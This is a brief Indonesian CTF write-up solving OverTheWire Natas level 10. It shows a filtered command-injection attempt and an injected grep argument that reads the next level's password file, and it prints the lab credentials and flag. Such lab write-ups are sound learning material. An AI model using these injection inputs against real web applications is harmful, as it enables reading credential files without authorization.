write up ctf by ariafatah

ariaf.my.id/ctf_aria/natas/level 10.html

soal

Username: natas10
URL: http://natas10.natas.labs.overthewire.org

solve

  • use cred natas10:t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu
  • setelah saya login terdapat sebuah form input seperti sesbelumnya hanya saja sepertinya terdapat keamanan yang lebih baik alt text
    • terdapat pengecualian pada teks seperti “/[; &]/”
    • disini saya mencoba untuk melakukan bypass sperti menggunakan url encode namun masih belum berhasil 
      %3Bwhoami%3B
    • https://github.com/payloadbox/command-injection-payload-list
    • https://owasp.org/www-community/attacks/Command_Injection
    • https://book.hacktricks.xyz/pentesting-web/command-injection
  • lalu saya terpikir sesuatu untuk mencoba grep file /etc/natas_pass saja alt text 
    a /etc/natas_webpass/natas11
  • dan akhirnya saya berhaasil mendapatkan flagnya 
    /etc/natas_webpass/natas11:UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk

flag

UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk